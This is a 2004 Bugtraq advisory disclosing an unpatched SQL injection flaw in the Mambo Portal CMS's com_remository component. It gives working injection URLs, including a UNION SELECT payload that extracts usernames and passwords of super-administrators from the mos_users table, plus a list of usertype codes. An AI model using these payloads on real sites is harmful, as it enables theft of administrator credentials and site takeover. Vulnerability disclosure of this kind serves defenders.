[36561] in bugtraq
Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL
daemon@ATHENA.MIT.EDU (khoaimi)
Sat Sep 18 13:15:03 2004
Date: 18 Sep 2004 03:39:46 -0000
Message-ID: <20040918033946.20676.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: khoaimi <kh0aimi@yahoo.com>
To: bugtraq@securityfocus.com
Vendor
www.mamboportal.com
Message from vendor : Mambo is one of the most powerful Open Source Content Management Systems on the planet. It is used all over the world for everything from simple websites to complex corporate applications. Mambo is easy to install, simple to manage, and reliable.
Bug name : SQL injection
Version : lastest Version 4.5.1(1.0.9) and lower.
Exploit :
http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*
You can exploit from the table "mos_users" with the query below
http://www.mambosite.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*
with the values of usertype :
0 = superadministrator
1 = administrator
2 = editor
3 = user
5 = publisher
6 = manager
Vendor feedback :
Not yet
Vendor patch :
Not yet
khoai
www.xfrog.org
